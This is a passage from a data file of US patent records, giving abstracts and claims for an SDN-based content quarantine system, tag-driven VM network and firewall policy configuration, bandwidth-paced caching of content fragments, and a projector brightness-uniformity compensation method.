address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 2. The SDQ system of claim 1, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 3. The SDQ system of claim 1, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 4. The SDQ system of claim 1, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 5. The SDQ system of claim 1, wherein, to add a new tenant to the quorum system, the controller/orchestrator is configured to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 6. The SDQ system of claim 1, wherein, to classify the content, the controller/orchestrator is configured to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 7. The SDQ system of claim 1, wherein, for suspicious content, the controller/orchestrator is configured to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 8. A controller/orchestrator part of a Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the controller/orchestrator comprising:
a network interface communicatively coupled to a network which connects to a plurality of compute/storage devices each comprising a normal container and a quarantine container; one or more processors communicatively coupled to the network interface; and memory storing instructions that, when executed, cause the one or more processors to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 9. The controller/orchestrator of claim 8, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 10. The controller/orchestrator of claim 8, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 11. The controller/orchestrator of claim 8, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 12. The controller/orchestrator of claim 8, wherein, to add a new tenant to the quorum system, the memory storing instructions that, when executed, further cause the one or more processors to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 13. The controller/orchestrator of claim 8, wherein, to classify the content, the memory storing instructions that, when executed, further cause the one or more processors to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 14. The controller/orchestrator of claim 8, wherein, for suspicious content, the memory storing instructions that, when executed, further cause the one or more processors to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 15. A Software Defined Quorum (SDQ) method implemented by a controller/orchestrator using Software Defined Networking (SDN), wherein the controller/orchestrator is communicatively coupled to a plurality compute/storage devices and each comprising a normal container and a quarantine container, the SDQ method comprising:
classifying content in the quorum system based on policy attributes; addressing content to the plurality of compute/storage devices using a service tag based on networking attributes for the network; and addressing the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 16. The SDQ method of claim 15, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 17. The SDQ method of claim 15, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 18. The SDQ method of claim 15, wherein, to add a new tenant to the quorum system, the SDQ method further comprising:
receiving the policy attributes from the new tenant; allocating the service tag, the first customer tag, and the second tag for the new tenant; and creating the normal container and the quarantine container on each of the plurality of compute/storage devices. 19. The SDQ method of claim 15, wherein, to classify the content, the SDQ method further comprising:
maintaining a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and updating or populating the journal based on the policy attributes for the tenant. 20. The SDQ method of claim 15, wherein, for suspicious content, the SDQ method further comprising:
addressing the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of reporting the suspicious content and providing a sample of the suspicious content for threat intelligence. | 2,400 |
9,184 | 9,184 | 15,384,129 | 2,433 | A method of configuring networking, security, and operational parameters of workloads deployed in a virtualized computing environment includes the steps of: storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters the virtual computing instance therewith. | 1. A method of configuring a virtual computing instance for execution in a virtual computing environment, comprising:
storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith. 2. The method of claim 1, wherein the host machine includes a virtualization layer that supports execution of the virtual computing instance in the host machine, the virtualization layer including a logical switch to which a virtual network interface controller of the virtual computing instance is connected for communication with other computing entities. 3. The method of claim 2, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 4. The method of claim 1, wherein one of the tags is associated with more than one policy. 5. The method of claim 1, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 6. The method of claim 5, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 7. The method of claim 1, wherein the policies are applied to a distributed firewall. 8. The method of claim 1, wherein the policies are applied to packet flow monitoring. 9. A method of deploying a virtual computing instance for execution in a host machine, wherein policies, each defining configurations of the virtual computing instance, are created in a process independent of the deployment of the virtual computing instance, comprising:
transmitting a first request to instantiate the virtual computing instance to the host machine; specifying a logical port to which the virtual computing instance is to be connected; identifying tags associated with the virtual computing instance; and transmitting a second request to perform network configuration of the virtual computing instance to a network management server, the request including the tags and an identification of the logical port, wherein the network management server, in response to the request, generates network configuration parameters for the virtual computing instance based on the tags, the logical port, and policies which were defined prior to and independent of the first request. 10. The method of claim 9, wherein the tags associated with the virtual computing instance are identified based on tags associated with a template from which the virtual computing instance will be instantiated. 11. The method of claim 10, wherein one of the tags is associated with more than one template. 12. The method of claim 10, wherein one of the templates is associated with more than one tag. 13. The method of claim 10, wherein the tags associated with the virtual computing instance are additionally identified based on inputs made by an administrator. 14. A virtualized computing system comprising:
a host machine having a virtualization layer that supports execution of virtual computing instances; a first management server configured to manage deployment of virtual computing instances on the host; and a second management server configured to perform network configurations of virtual computing instances deployed by the first management server, wherein the second management server stores multiple policies, each defining one of networking, security, or operational parameters, and associates tags to each of the multiple policies and responsive to a request from the first management server to perform configuration of a virtual computing instance being deployed on the host machine: retrieves policies among the stored multiple policies that are associated with same tags as tags contained in the request; generates configuration parameters for data path components in the host machine and for data path components of the virtual computing instance based on the retrieved policies; and transmits the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters the virtual computing instance therewith. 15. The system of claim 14, wherein the virtualization layer includes a logical switch to which a virtual network interface controller of the virtual computing instance is to be connected for communication with other computing entities. 16. The system of claim 15, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 17. The system of claim 14, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 18. The system of claim 17, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 19. The system of claim 14, wherein the policies are applied to a distributed firewall. 20. The system of claim 14, wherein the policies are applied to packet flow monitoring. | A method of configuring networking, security, and operational parameters of workloads deployed in a virtualized computing environment includes the steps of: storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters the virtual computing instance therewith.1. A method of configuring a virtual computing instance for execution in a virtual computing environment, comprising:
storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith. 2. The method of claim 1, wherein the host machine includes a virtualization layer that supports execution of the virtual computing instance in the host machine, the virtualization layer including a logical switch to which a virtual network interface controller of the virtual computing instance is connected for communication with other computing entities. 3. The method of claim 2, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 4. The method of claim 1, wherein one of the tags is associated with more than one policy. 5. The method of claim 1, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 6. The method of claim 5, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 7. The method of claim 1, wherein the policies are applied to a distributed firewall. 8. The method of claim 1, wherein the policies are applied to packet flow monitoring. 9. A method of deploying a virtual computing instance for execution in a host machine, wherein policies, each defining configurations of the virtual computing instance, are created in a process independent of the deployment of the virtual computing instance, comprising:
transmitting a first request to instantiate the virtual computing instance to the host machine; specifying a logical port to which the virtual computing instance is to be connected; identifying tags associated with the virtual computing instance; and transmitting a second request to perform network configuration of the virtual computing instance to a network management server, the request including the tags and an identification of the logical port, wherein the network management server, in response to the request, generates network configuration parameters for the virtual computing instance based on the tags, the logical port, and policies which were defined prior to and independent of the first request. 10. The method of claim 9, wherein the tags associated with the virtual computing instance are identified based on tags associated with a template from which the virtual computing instance will be instantiated. 11. The method of claim 10, wherein one of the tags is associated with more than one template. 12. The method of claim 10, wherein one of the templates is associated with more than one tag. 13. The method of claim 10, wherein the tags associated with the virtual computing instance are additionally identified based on inputs made by an administrator. 14. A virtualized computing system comprising:
a host machine having a virtualization layer that supports execution of virtual computing instances; a first management server configured to manage deployment of virtual computing instances on the host; and a second management server configured to perform network configurations of virtual computing instances deployed by the first management server, wherein the second management server stores multiple policies, each defining one of networking, security, or operational parameters, and associates tags to each of the multiple policies and responsive to a request from the first management server to perform configuration of a virtual computing instance being deployed on the host machine: retrieves policies among the stored multiple policies that are associated with same tags as tags contained in the request; generates configuration parameters for data path components in the host machine and for data path components of the virtual computing instance based on the retrieved policies; and transmits the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters the virtual computing instance therewith. 15. The system of claim 14, wherein the virtualization layer includes a logical switch to which a virtual network interface controller of the virtual computing instance is to be connected for communication with other computing entities. 16. The system of claim 15, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 17. The system of claim 14, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 18. The system of claim 17, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 19. The system of claim 14, wherein the policies are applied to a distributed firewall. 20. The system of claim 14, wherein the policies are applied to packet flow monitoring. | 2,400 |
9,185 | 9,185 | 15,585,590 | 2,456 | Methods and systems are disclosed herein for managing delivery of content fragments to a device in response to a bandwidth determination. In one implementation of the disclosure, when a content player or device requests a content fragments, a local cache may determine a bandwidth or data rate related to transmission of a content fragment from a source to the cache, and send the fragment to the player at a rate corresponding to the determined bandwidth or data rate. | 1. A method comprising:
receiving, from a content source, a plurality of content fragments and storing them in a cache; receiving, from a playback device, a request for one of the plurality of content fragments; determining a length of time associated with receipt of the content fragment from the content source; determining a bandwidth associated with transmission of the content fragment based on the determined length of time and a size of the content fragment; and sending, to the playback device, the content fragment at a rate determined in accordance with the determined bandwidth. 2. The method of claim 1, further comprising determining a playback quality associated with the content fragment based on the determined bandwidth. 3. The method of claim 1, wherein sending the content fragment at a rate determined in accordance with the determined bandwidth comprises sending the content asset at a rate that does not exceed the determined bandwidth. 4. The method of claim 1, wherein determining a bandwidth associated with transmission of the content fragment comprises dividing the size of the content fragment by the determined length of time. 5. The method of claim 1, wherein the content source communicates with the device using HTTP/2 protocol. 6. The method of claim 5, wherein receiving a plurality of content fragments comprises receiving a push promise message from the content source. 7. The method of claim 6, wherein the push promise message comprises the size of each of the one or more content fragments. 8. The method of claim 7, further comprising storing the size of a content fragment as metadata with the corresponding content fragment. 9. A method comprising:
receiving, from a playback component of a device, a request for a first content fragment; sending, to a content source, the request for the first content fragment; receiving, from the content source, the first content fragment and a second content fragment and storing the first content fragment and the second content fragment in a cache; determining a first length of time associated with receipt of the first content fragment from the content source and a second length of time associated with receipt of the second content fragment from the content source; determining a first bandwidth based on the first length of time and a size of the first content fragment and a second bandwidth based on the second length of time and a size of the second content fragment; sending, to the playback component from the cache, the first content fragment at a rate determined in accordance with the first bandwidth; receiving, from the playback component, a request for the second content fragment; and sending, to the playback component from the cache, the second content fragment at a rate determined in accordance with the second bandwidth. 10. The method of claim 9, wherein receiving the first content fragment and the second content fragment comprises receiving the first content fragment and the second content fragment in response to a determination by the content source that the playback component is likely to request playback of the second content fragment. 11. The method of claim 10, wherein determining at the content source that the playback component is likely to request playback of the second content fragment comprises determining at the content source that the second content fragment is related to the first content fragment. 12. The method of claim 9, wherein sending the first content fragment at a rate determined in accordance with the first bandwidth comprises sending the first content asset at a rate that does not exceed the first bandwidth and sending the second content fragment at a rate determined in accordance with the second bandwidth comprises sending the second content asset at a rate that does not exceed the second bandwidth. 13. The method of claim 9, wherein determining the first bandwidth comprises dividing the size of the first content fragment by the first length of time and determining the second bandwidth comprises dividing the size of the second content fragment by the second length of time. 14. The method of claim 9, wherein the content source communicates with the device using HTTP/2 protocol. 15. The method of claim 14, wherein receiving the first content fragment and the second content fragment comprises receiving a push promise message from the content source. 16. The method of claim 15, wherein the push promise message comprises the size of the first content fragment and the size of the second content fragment. 17. The method of claim 16, further comprising storing the size of the first content fragment as metadata with the first content fragment and the size of the second content fragment as metadata with the second content fragment. 18. A method comprising:
sending, to a cache associated with a device, a request for a content fragment; receiving, from the cache, the content fragment at a rate determined in accordance with a bandwidth based on a length of time associated with receipt of the content asset from a source and a size of the content fragment; and initializing playback of the content fragment. 19. The method of claim 18, wherein the cache communicates with the source using HTTP/2 protocol. 20. The method of claim 19, wherein the cache receives from the source a push promise message, the push promise message comprising the size of the content fragment. | Methods and systems are disclosed herein for managing delivery of content fragments to a device in response to a bandwidth determination. In one implementation of the disclosure, when a content player or device requests a content fragments, a local cache may determine a bandwidth or data rate related to transmission of a content fragment from a source to the cache, and send the fragment to the player at a rate corresponding to the determined bandwidth or data rate.1. A method comprising:
receiving, from a content source, a plurality of content fragments and storing them in a cache; receiving, from a playback device, a request for one of the plurality of content fragments; determining a length of time associated with receipt of the content fragment from the content source; determining a bandwidth associated with transmission of the content fragment based on the determined length of time and a size of the content fragment; and sending, to the playback device, the content fragment at a rate determined in accordance with the determined bandwidth. 2. The method of claim 1, further comprising determining a playback quality associated with the content fragment based on the determined bandwidth. 3. The method of claim 1, wherein sending the content fragment at a rate determined in accordance with the determined bandwidth comprises sending the content asset at a rate that does not exceed the determined bandwidth. 4. The method of claim 1, wherein determining a bandwidth associated with transmission of the content fragment comprises dividing the size of the content fragment by the determined length of time. 5. The method of claim 1, wherein the content source communicates with the device using HTTP/2 protocol. 6. The method of claim 5, wherein receiving a plurality of content fragments comprises receiving a push promise message from the content source. 7. The method of claim 6, wherein the push promise message comprises the size of each of the one or more content fragments. 8. The method of claim 7, further comprising storing the size of a content fragment as metadata with the corresponding content fragment. 9. A method comprising:
receiving, from a playback component of a device, a request for a first content fragment; sending, to a content source, the request for the first content fragment; receiving, from the content source, the first content fragment and a second content fragment and storing the first content fragment and the second content fragment in a cache; determining a first length of time associated with receipt of the first content fragment from the content source and a second length of time associated with receipt of the second content fragment from the content source; determining a first bandwidth based on the first length of time and a size of the first content fragment and a second bandwidth based on the second length of time and a size of the second content fragment; sending, to the playback component from the cache, the first content fragment at a rate determined in accordance with the first bandwidth; receiving, from the playback component, a request for the second content fragment; and sending, to the playback component from the cache, the second content fragment at a rate determined in accordance with the second bandwidth. 10. The method of claim 9, wherein receiving the first content fragment and the second content fragment comprises receiving the first content fragment and the second content fragment in response to a determination by the content source that the playback component is likely to request playback of the second content fragment. 11. The method of claim 10, wherein determining at the content source that the playback component is likely to request playback of the second content fragment comprises determining at the content source that the second content fragment is related to the first content fragment. 12. The method of claim 9, wherein sending the first content fragment at a rate determined in accordance with the first bandwidth comprises sending the first content asset at a rate that does not exceed the first bandwidth and sending the second content fragment at a rate determined in accordance with the second bandwidth comprises sending the second content asset at a rate that does not exceed the second bandwidth. 13. The method of claim 9, wherein determining the first bandwidth comprises dividing the size of the first content fragment by the first length of time and determining the second bandwidth comprises dividing the size of the second content fragment by the second length of time. 14. The method of claim 9, wherein the content source communicates with the device using HTTP/2 protocol. 15. The method of claim 14, wherein receiving the first content fragment and the second content fragment comprises receiving a push promise message from the content source. 16. The method of claim 15, wherein the push promise message comprises the size of the first content fragment and the size of the second content fragment. 17. The method of claim 16, further comprising storing the size of the first content fragment as metadata with the first content fragment and the size of the second content fragment as metadata with the second content fragment. 18. A method comprising:
sending, to a cache associated with a device, a request for a content fragment; receiving, from the cache, the content fragment at a rate determined in accordance with a bandwidth based on a length of time associated with receipt of the content asset from a source and a size of the content fragment; and initializing playback of the content fragment. 19. The method of claim 18, wherein the cache communicates with the source using HTTP/2 protocol. 20. The method of claim 19, wherein the cache receives from the source a push promise message, the push promise message comprising the size of the content fragment. | 2,400 |
9,186 | 9,186 | 15,607,098 | 2,422 | Disclosed are a display uniformity compensation method, an optical modulation apparatus, a signal processor, and a projection system. The method comprises: acquiring original image data and an optical loss coefficient a of a compensation region, acquiring t1 and t2, and making t2/t1=f a/(1−a), where 0<f<=1, and t1+t2=T; determining full region image data and compensation image data through the original image data, t1, t2, and a, within time T when a frame of an image is being modulated, acquiring original light with a period of time t1, and performing modulation on the original light according to the full region image data; and acquiring compensation light within a period of time t2, other than the period of time t1, within the time T, and performing modulation on the compensation light according to the compensation image data. An embodiment of the present invention provides a method for improving a uniformity degree of brightness of an image on a display unit. | 1. A light source system, comprising:
an original light source, for generating an original light; a compensation light source, for generating a compensation light; a wavelength conversion device, including a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light; and a control device, for controlling turning on and turning off of the original light source and the compensation light source. 2. The light source system of claim 1, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 3. The light source system of claim 1, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 4. The light source system of claim 1, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 5. The light source system of claim 4, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 6. The light source system of claim 1, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 7. The light source system of claim 6, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 8. The light source system of claim 6, wherein the wavelength conversion layer has a circular shape, wherein the original region and the compensation region each spans an angular range, and wherein a ratio of the angular ranges of the original region and the compensation region is a predetermined value. 9. The light source system of claim 6, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 10. The light source system of claim 1, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 11. The light source system of claim 1, further comprising a light combination device which combines the original light and the compensation light into one beam of output light. 12. The light source system of claim 11, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 13. A projection system, comprising:
a light source system; an optical modulation device; and a projection lens, wherein the light source system includes an original light source generating an original light, a compensation light source generating a compensation light, a wavelength conversion device and a control device, wherein the wavelength conversion device includes a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light, and wherein the control device controls turning on and turning off of the original light source and the compensation light source, wherein the optical modulation device modulates the light outputted by the light source system to generate an image light beam, and wherein the projection lens projects the image light beam from the optical modulation device to a predetermined plane. 14. The projection system of claim 13, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 15. The projection system of claim 13, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 16. The projection system of claim 13, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 17. The projection system of claim 16, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 18. The projection system of claim 13, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 19. The projection system of claim 18, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 20. The projection system of claim 18, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 21. The projection system of claim 13, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 22. The projection system of claim 13, wherein the light source system further includes a light combination device which combines the original light and the compensation light into one beam of output light. 23. The projection system of claim 22, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 24. The projection system of claim 13, wherein the optical modulation device includes a signal processor, for:
acquiring an original image data and an optical loss coefficient a of a compensation region, where a grayscale value of the original image data corresponding to an arbitrary point A in a non-compensation region of a display unit is u, and that corresponding to an arbitrary point B in the predetermined compensation region of the display unit is v; acquiring values t1 and t2, such that t2/t1=f*a/(1−a), where 0<f≦1, and t1+t2=T; acquiring values m and n, such that m*t1/T+n*t2/T=u*t1/T, and where at least two values among m, n and u satisfy a predetermined relationship; determining a full region image data and a compensation image data based on m, n and v, where a grayscale value of the full region image data corresponding to the point A is m and that corresponding to the point B is v, and where a grayscale value of the compensation image data corresponding to the point A is n and that corresponding to the point B is q, where q≧v, and where q and v satisfy a predetermined relationship; and wherein the optical modulation device acquires the original light and modulates the original light according to the full region image data within a time period t1 of a time period T when a frame of image is being modulated, and acquires a compensation light and modulates the compensation light according to the compensation image data within a time period t2 of the time period T, wherein t2 is a time period within the time period T other than the time period t1. | Disclosed are a display uniformity compensation method, an optical modulation apparatus, a signal processor, and a projection system. The method comprises: acquiring original image data and an optical loss coefficient a of a compensation region, acquiring t1 and t2, and making t2/t1=f a/(1−a), where 0<f<=1, and t1+t2=T; determining full region image data and compensation image data through the original image data, t1, t2, and a, within time T when a frame of an image is being modulated, acquiring original light with a period of time t1, and performing modulation on the original light according to the full region image data; and acquiring compensation light within a period of time t2, other than the period of time t1, within the time T, and performing modulation on the compensation light according to the compensation image data. An embodiment of the present invention provides a method for improving a uniformity degree of brightness of an image on a display unit.1. A light source system, comprising:
an original light source, for generating an original light; a compensation light source, for generating a compensation light; a wavelength conversion device, including a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light; and a control device, for controlling turning on and turning off of the original light source and the compensation light source. 2. The light source system of claim 1, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 3. The light source system of claim 1, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 4. The light source system of claim 1, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 5. The light source system of claim 4, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 6. The light source system of claim 1, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 7. The light source system of claim 6, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 8. The light source system of claim 6, wherein the wavelength conversion layer has a circular shape, wherein the original region and the compensation region each spans an angular range, and wherein a ratio of the angular ranges of the original region and the compensation region is a predetermined value. 9. The light source system of claim 6, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 10. The light source system of claim 1, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 11. The light source system of claim 1, further comprising a light combination device which combines the original light and the compensation light into one beam of output light. 12. The light source system of claim 11, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 13. A projection system, comprising:
a light source system; an optical modulation device; and a projection lens, wherein the light source system includes an original light source generating an original light, a compensation light source generating a compensation light, a wavelength conversion device and a control device, wherein the wavelength conversion device includes a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light, and wherein the control device controls turning on and turning off of the original light source and the compensation light source, wherein the optical modulation device modulates the light outputted by the light source system to generate an image light beam, and wherein the projection lens projects the image light beam from the optical modulation device to a predetermined plane. 14. The projection system of claim 13, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 15. The projection system of claim 13, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 16. The projection system of claim 13, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 17. The projection system of claim 16, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 18. The projection system of claim 13, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 19. The projection system of claim 18, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 20. The projection system of claim 18, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 21. The projection system of claim 13, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 22. The projection system of claim 13, wherein the light source system further includes a light combination device which combines the original light and the compensation light into one beam of output light. 23. The projection system of claim 22, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 24. The projection system of claim 13, wherein the optical modulation device includes a signal processor, for:
acquiring an original image data and an optical loss coefficient a of a compensation region, where a grayscale value of the original image data corresponding to an arbitrary point A in a non-compensation region of a display unit is u, and that corresponding to an arbitrary point B in the predetermined compensation region of the display unit is v; acquiring values t1 and t2, such that t2/t1=f*a/(1−a), where 0<f≦1, and t1+t2=T; acquiring values m and n, such that m*t1/T+n*t2/T=u*t1/T, and where at least two values among m, n and u satisfy a predetermined relationship; determining a full region image data and a compensation image data based on m, n and v, where a grayscale value of the full region image data corresponding to the point A is m and that corresponding to the point B is v, and where a grayscale value of the compensation image data corresponding to the point A is n and that corresponding to the point B is q, where q≧v, and where q and v satisfy a predetermined relationship; and wherein the optical modulation device acquires the original light and modulates the original light according to the full region image data within a time period t1 of a time period T when a frame of image is being modulated, and acquires a compensation light and modulates the compensation light according to the compensation image data within a time period t2 of the time period T, wherein t2 is a time period within the time period T other than the time period t1. | 2,400 |
